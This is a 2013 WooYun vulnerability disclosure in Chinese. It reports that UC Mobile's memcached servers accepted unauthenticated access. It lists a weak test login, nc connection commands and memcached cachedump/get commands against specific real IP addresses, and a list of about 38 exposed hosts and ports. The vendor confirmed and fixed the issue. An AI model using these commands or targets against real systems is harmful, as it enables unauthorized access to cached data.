当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018975

漏洞标题:UC运维不当 可导致大量数据泄漏

相关厂商:UC Mobile

漏洞作者: 你撸我也撸

提交时间:2013-02-21 00:06

修复时间:2013-04-07 00:07

公开时间:2013-04-07 00:07

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-02-21: 细节已通知厂商并且等待厂商处理中
2013-02-21: 厂商已经确认,细节仅向厂商公开
2013-03-03: 细节向核心白帽子及相关领域专家公开
2013-03-13: 细节向普通白帽子公开
2013-03-23: 细节向实习白帽子公开
2013-04-07: 细节向公众公开

简要描述:

RT!

详细说明:

先给个弱口令:
test 123456


1.png


漏洞证明:


哥差点把小心肝都吓出来了,这整个C段的memcached都是你们家的吧?
先引用一下yunshu的case: WooYun: memcached未作IP限制导致缓存数据可被攻击者控制 
可以直接对缓存进行get、replace、incr/decr等操作:


nc -vv 121.14.161.152 11211


stats items


3.png


stats cachedump 167 0


4.png


get图片的缓存:


5.png


nc -vv 121.14.161.152 11215


6.png


121.14.161.151: 11211
121.14.161.152: 11211
121.14.161.152: 11215
121.14.161.153: 11211
121.14.161.155: 11211
121.14.161.154: 11211
121.14.161.156: 11211
121.14.161.157: 11211
121.14.161.159: 11211
121.14.161.158: 11211
121.14.161.160: 11211
121.14.161.161: 11211
121.14.161.163: 11211
121.14.161.162: 11211
121.14.161.180: 11211
121.14.161.187: 11211
121.14.161.197: 11211
121.14.161.205: 11211
121.14.161.214: 11211
121.14.161.153: 11212
121.14.161.153: 11215
121.14.161.154: 11212
121.14.161.154: 11215
121.14.161.155: 11212
121.14.161.155: 11215
121.14.161.159: 11212
121.14.161.159: 11215
121.14.161.160: 11212
121.14.161.160: 11215
121.14.161.161: 11212
121.14.161.171: 11212
121.14.161.171: 11215
121.14.161.172: 11212
121.14.161.172: 11215
121.14.161.173: 11212
121.14.161.179: 11212
121.14.161.179: 11215
121.14.161.205: 11212

修复方案:

 WooYun: memcached未作IP限制导致缓存数据可被攻击者控制  这个标题中已经给出比较合理的修复方案了!

版权声明:转载请注明来源 你撸我也撸@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-02-21 11:05

厂商回复:

非常感谢你撸我也撸提交安全漏洞,运维人员疏忽导致,我们会尽快处理。

最新状态:

2013-02-22:已修复,谢谢!